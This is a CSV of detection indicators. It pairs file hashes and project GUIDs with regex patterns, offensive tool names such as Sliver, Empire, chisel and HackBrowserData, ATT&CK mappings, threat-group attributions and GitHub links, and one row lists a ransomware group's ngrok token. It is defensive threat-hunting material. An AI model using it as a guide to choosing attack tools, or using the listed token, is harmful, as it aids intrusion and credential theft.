"*27d206d156a0ede1cc521bb7d41588cd6c76c39ec4328c455923b718a52a4789*",".{0,1000}27d206d156a0ede1cc521bb7d41588cd6c76c39ec4328c455923b718a52a4789.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","23584"
"*27dca74d091f98b35dd158f7060e06b7020068448c731a40b6c2bf98d7c4f2d8*",".{0,1000}27dca74d091f98b35dd158f7060e06b7020068448c731a40b6c2bf98d7c4f2d8.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","23587"
"*27E42E24-9F76-44E2-B1D6-82F68D5C4466*",".{0,1000}27E42E24\-9F76\-44E2\-B1D6\-82F68D5C4466.{0,1000}","offensive_tool_keyword","POC","Local Privilege Escalation from Admin to Kernel vulnerability on Windows 10 and Windows 11 operating systems with HVCI enabled.","T1055.011 - T1548.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/hakaioffsec/CVE-2024-21338","1","0","#GUIDproject","N/A","9","3","292","60","2024-04-16T21:00:14Z","2024-04-13T05:53:02Z","23589"
"*27e71eebac244f803d825159fe3b1971c9bfb169*",".{0,1000}27e71eebac244f803d825159fe3b1971c9bfb169.{0,1000}","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071.004 - T1568.002 - T1105 ","TA0011 - TA0005","N/A","N/A","C2","https://github.com/sensepost/godoh","1","0","N/A","N/A","10","10","779","125","2023-12-19T07:21:45Z","2018-10-23T07:24:04Z","23591"
"*27f12aba29935f8a06182f8e7d7263dc7d01280fc2a1cc70aafecb2c87079be9*",".{0,1000}27f12aba29935f8a06182f8e7d7263dc7d01280fc2a1cc70aafecb2c87079be9.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23592"
"*27f1C8X9cfrYlKDqSViVB3O98xj_56MqzcTRpNGioTnpwbJVj*",".{0,1000}27f1C8X9cfrYlKDqSViVB3O98xj_56MqzcTRpNGioTnpwbJVj.{0,1000}","offensive_tool_keyword","Dispossessor","ngrok authent token used by Dispossessor ransomware group","T1090 - T1095 - T1008 - T1102 - T1572 - T1567 - T1568.002","TA0011 - TA0010 - TA0005","N/A","Dispossessor","C2","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","23593"
"*27f443acc6d3ba9588017121dc2e70f8aed6224a69d8f41b0a51afb21b8fd259*",".{0,1000}27f443acc6d3ba9588017121dc2e70f8aed6224a69d8f41b0a51afb21b8fd259.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","0","#filehash","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","23595"
"*27f70a1d533f7a3b8703d89904ae4541d96c8c656661872a495f592f9ed80d9e*",".{0,1000}27f70a1d533f7a3b8703d89904ae4541d96c8c656661872a495f592f9ed80d9e.{0,1000}","offensive_tool_keyword","LatLoader","PoC module to demonstrate automated lateral movement with the Havoc C2 framework","T1570 - T1071 - T1021 - T1563 - T1105","TA0008 - TA0011 - TA0002 - TA0010","N/A","N/A","Lateral Movement","https://github.com/icyguider/LatLoader","1","0","#filehash","N/A","9","4","301","35","2023-12-09T00:28:32Z","2023-10-06T15:03:17Z","23597"
"*27F85701-FD37-4D18-A107-20E914F8E779*",".{0,1000}27F85701\-FD37\-4D18\-A107\-20E914F8E779.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","0","#GUIDproject","N/A","10","10","371","50","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z","23598"
"*28009247ff5f8ee93dcf3fa06e60eb43374eec61f816feb61081e2d53f4806be*",".{0,1000}28009247ff5f8ee93dcf3fa06e60eb43374eec61f816feb61081e2d53f4806be.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","23600"
"*2801fabd9ad692f666d98e5850cd634681d7ffb3c71bbe9badfef2f81d35605b*",".{0,1000}2801fabd9ad692f666d98e5850cd634681d7ffb3c71bbe9badfef2f81d35605b.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","23601"
"*28110f190791aa5b4ca3f0c36dfc39cda8716f165789599de34c8578a70357fd*",".{0,1000}28110f190791aa5b4ca3f0c36dfc39cda8716f165789599de34c8578a70357fd.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","23603"
"*282664f0cbf48838d9ef0321b748721b14dd40948e0f16babdb31e458e06dbe6*",".{0,1000}282664f0cbf48838d9ef0321b748721b14dd40948e0f16babdb31e458e06dbe6.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","23605"
"*28272a895f6980919f0a7acd8bfda4435c2a1a0b151c90f1113eda1eff12abd0*",".{0,1000}28272a895f6980919f0a7acd8bfda4435c2a1a0b151c90f1113eda1eff12abd0.{0,1000}","offensive_tool_keyword","DRSAT","Disconnected RSAT is a launcher for the official Group Policy Manager - Certificate Authority and Certificate Templates snap-in to bypass the domain joined requirement that is needed when using the official MMC snap-in. The tool works by injecting a C# library into MMC that will hook the various API calls to trick MMC into believing that the logged on user is a domain user. attackers can abuse Disconnected RSAT to interact with Active Directory (AD) environments from non-domain-joined machines","T1559.001 - T1112 - T1078 - T1134.002 - T1055.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/DRSAT","1","0","#filehash","N/A","6","3","233","25","2024-12-27T11:44:18Z","2024-09-04T16:35:02Z","23606"
"*282dd8c14f421dae167e02a50da13d210e34059230779eb30b70e222b04e55c6*",".{0,1000}282dd8c14f421dae167e02a50da13d210e34059230779eb30b70e222b04e55c6.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","23607"
"*2833afc31c227a193622b57b6a5e1093add63d853a276915081095f543d62099*",".{0,1000}2833afc31c227a193622b57b6a5e1093add63d853a276915081095f543d62099.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","23608"
"*283516d3927c180b3f4b8d90cefaaf34ff66a5250f218fa327e194f71748e015*",".{0,1000}283516d3927c180b3f4b8d90cefaaf34ff66a5250f218fa327e194f71748e015.{0,1000}","offensive_tool_keyword","BabyShark","This is a basic C2 generic server written in Python and Flask.","T1547.001 - T1059.003 - T1132.001 - T1140 - T1083 - T1070.004 - T1105 - T1056.001 - T1057 - T1012 - T1053.005 - T1218.005 - T1082 - T1016 - T1033","TA0006 - TA0011 - TA0040","N/A","Kimsuky","C2","https://github.com/UnkL4b/BabyShark","1","0","#filehash","N/A","10","10","189","30","2021-07-03T00:18:18Z","2020-06-02T12:27:20Z","23609"
"*283b1a457e8aff360521928e64447e360752cc978287e51f67934fc803699c11*",".{0,1000}283b1a457e8aff360521928e64447e360752cc978287e51f67934fc803699c11.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","#filehash","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","23610"
"*283baf6fffaad806ac328d750ff3014c917378455b54d58d0ba9252a502f8dff*",".{0,1000}283baf6fffaad806ac328d750ff3014c917378455b54d58d0ba9252a502f8dff.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","23611"
"*284aac919a7582ec6ec1d6c71656c8177c56c1b8734834f66bc17b6d59e74b3c*",".{0,1000}284aac919a7582ec6ec1d6c71656c8177c56c1b8734834f66bc17b6d59e74b3c.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23612"
"*2852680c94a9d68cdab285012d9328a1ceca290db60c9e35155c2bb3e46a41b4*",".{0,1000}2852680c94a9d68cdab285012d9328a1ceca290db60c9e35155c2bb3e46a41b4.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23614"
"*2853789802f12b625e35704cd43b0dbcffa250d721721edd9c257c0efa940581*",".{0,1000}2853789802f12b625e35704cd43b0dbcffa250d721721edd9c257c0efa940581.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","23615"
"*285a2bf9a6a6a90d942d0c20832f5c0722e3aa557498cd1b6208b52932bbc18d*",".{0,1000}285a2bf9a6a6a90d942d0c20832f5c0722e3aa557498cd1b6208b52932bbc18d.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","23616"
"*285e1d699b5c623b0df102e330ed97e7fa64e13dfe9b2c789a0a7dc2544e44db*",".{0,1000}285e1d699b5c623b0df102e330ed97e7fa64e13dfe9b2c789a0a7dc2544e44db.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","23617"
"*285ee27ec825b9a981a36594658a7943eba63fe0b4237f0110cc57729fbf3b76*",".{0,1000}285ee27ec825b9a981a36594658a7943eba63fe0b4237f0110cc57729fbf3b76.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","23618"
"*28625926a22131062b34670f36dafb312c2631b576bcfa0f9544994de77b6544*",".{0,1000}28625926a22131062b34670f36dafb312c2631b576bcfa0f9544994de77b6544.{0,1000}","offensive_tool_keyword","ghostsocks","SOCKS5 proxy based on lightsocks","T1090.002 - T1090","TA0005 - TA0008","Lumma Stealer","N/A","Defense Evasion","https://github.com/LemonSaaS/ghostsocks","1","0","#filehash","N/A","7","1","2","1","2017-11-14T16:56:05Z","2017-11-13T03:38:57Z","23619"
"*286a68fb3a355b790f127b74edb0d084749960ee7b1d9e66c1eb094c14733631*",".{0,1000}286a68fb3a355b790f127b74edb0d084749960ee7b1d9e66c1eb094c14733631.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","#filehash","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","23620"
"*286b57ee049f0d59eac77af0171bbe4d21c5e2e6ea89a0b1847c5b1fea2a9cb0*",".{0,1000}286b57ee049f0d59eac77af0171bbe4d21c5e2e6ea89a0b1847c5b1fea2a9cb0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","23622"
"*286ccf98346d4a92af9eada9e364e279de416e110e9f1ba283f78fcb432579a2*",".{0,1000}286ccf98346d4a92af9eada9e364e279de416e110e9f1ba283f78fcb432579a2.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23623"
"*2873fe0d14429c67afb56a58407a9ac664b395eb0fa7c8101f69b055e3f747fa*",".{0,1000}2873fe0d14429c67afb56a58407a9ac664b395eb0fa7c8101f69b055e3f747fa.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","#filehash","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","23625"
"*287f0bded23d895ed013d7d66f062560b983f1ed8881d59e0ab7e9374bd76c73*",".{0,1000}287f0bded23d895ed013d7d66f062560b983f1ed8881d59e0ab7e9374bd76c73.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","23627"
"*288690fbff02ab86b27552a54a1ded2743a4d819b9d3b2106ee91ee74bcda8fd*",".{0,1000}288690fbff02ab86b27552a54a1ded2743a4d819b9d3b2106ee91ee74bcda8fd.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23629"
"*288690fbff02ab86b27552a54a1ded2743a4d819b9d3b2106ee91ee74bcda8fd*",".{0,1000}288690fbff02ab86b27552a54a1ded2743a4d819b9d3b2106ee91ee74bcda8fd.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23630"
"*288690fbff02ab86b27552a54a1ded2743a4d819b9d3b2106ee91ee74bcda8fd*",".{0,1000}288690fbff02ab86b27552a54a1ded2743a4d819b9d3b2106ee91ee74bcda8fd.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23631"
"*288b02056109591e230be8268e3e41c61f791d0025008050fc1a558118234259*",".{0,1000}288b02056109591e230be8268e3e41c61f791d0025008050fc1a558118234259.{0,1000}","offensive_tool_keyword","Minimalistic-offensive","A repository of tools for pentesting of restricted and isolated environments.","T1110 - T1046 - T1021 - T1203 - T1485","TA0006 - TA0007 - TA0008","N/A","Dispossessor","Discovery","https://github.com/InfosecMatter/Minimalistic-offensive-security-tools","1","0","#filehash","N/A","7","6","562","121","2021-10-26T11:04:46Z","2020-05-10T17:40:31Z","23632"
"*289451cff336966b875ae92f5894b0b7daff939425756ba1b7f39b7e9eeedd0d*",".{0,1000}289451cff336966b875ae92f5894b0b7daff939425756ba1b7f39b7e9eeedd0d.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","23635"
"*28a29dffc8a5924a97a67798c91db2b75d5b2841ec3c810886fa5554fe2e899d*",".{0,1000}28a29dffc8a5924a97a67798c91db2b75d5b2841ec3c810886fa5554fe2e899d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","23636"
"*28a2e9e1ab772d0017aa994feae882eeea526fcbcb2f929ec410eabcf2912c14*",".{0,1000}28a2e9e1ab772d0017aa994feae882eeea526fcbcb2f929ec410eabcf2912c14.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","#filehash","N/A","10","10","1110","130","2025-03-24T10:23:58Z","2021-09-27T09:12:51Z","23637"
"*28ab7dedd22722c58a73927d50ce8100630d002c591e4c96cb492dd1fb5f649a*",".{0,1000}28ab7dedd22722c58a73927d50ce8100630d002c591e4c96cb492dd1fb5f649a.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","23638"
"*28b5a291efc22edff0f84eec3720d1513151a2a551b09896a7fff354cba5aaff*",".{0,1000}28b5a291efc22edff0f84eec3720d1513151a2a551b09896a7fff354cba5aaff.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","23640"
"*28bba6f4d8a170a77e383fe09fcc3d5258496fb45b0c226891cc51f8b96ef489*",".{0,1000}28bba6f4d8a170a77e383fe09fcc3d5258496fb45b0c226891cc51f8b96ef489.{0,1000}","offensive_tool_keyword","NativeBypassCredGuard","Bypass Credential Guard by patching WDigest.dll using only NTAPI functions","T1558 - T1003.006","TA0006 - TA0005","N/A","N/A","Defense Evasion","https://github.com/ricardojoserf/NativeBypassCredGuard","1","0","#filehash","N/A","7","3","236","28","2025-04-08T18:58:37Z","2024-12-01T16:58:03Z","23642"
"*28c0a69e67c7d310c12d3d7f2aee091e79b843cf392bb2bc503dc1b193f283e9*",".{0,1000}28c0a69e67c7d310c12d3d7f2aee091e79b843cf392bb2bc503dc1b193f283e9.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","#filehash","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","23643"
"*28c7ff1a0c4d4dd8fe1d4ef309d7784e112cd98f7ff7233085fda5b00020a18a*",".{0,1000}28c7ff1a0c4d4dd8fe1d4ef309d7784e112cd98f7ff7233085fda5b00020a18a.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","23644"
"*28cc172cc6ee61c985f733b0546dcec41ce3c7e1ce1c6bbb59b2991425e803cb*",".{0,1000}28cc172cc6ee61c985f733b0546dcec41ce3c7e1ce1c6bbb59b2991425e803cb.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","23645"
"*28cd619fdf0d374589890752fa44f8fa07dbcad9af8603313f6a88c8da2e2274*",".{0,1000}28cd619fdf0d374589890752fa44f8fa07dbcad9af8603313f6a88c8da2e2274.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","23646"
"*28CF3837-FF58-463B-AF81-E6B0039DE55F*",".{0,1000}28CF3837\-FF58\-463B\-AF81\-E6B0039DE55F.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","#GUIDproject","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","23647"
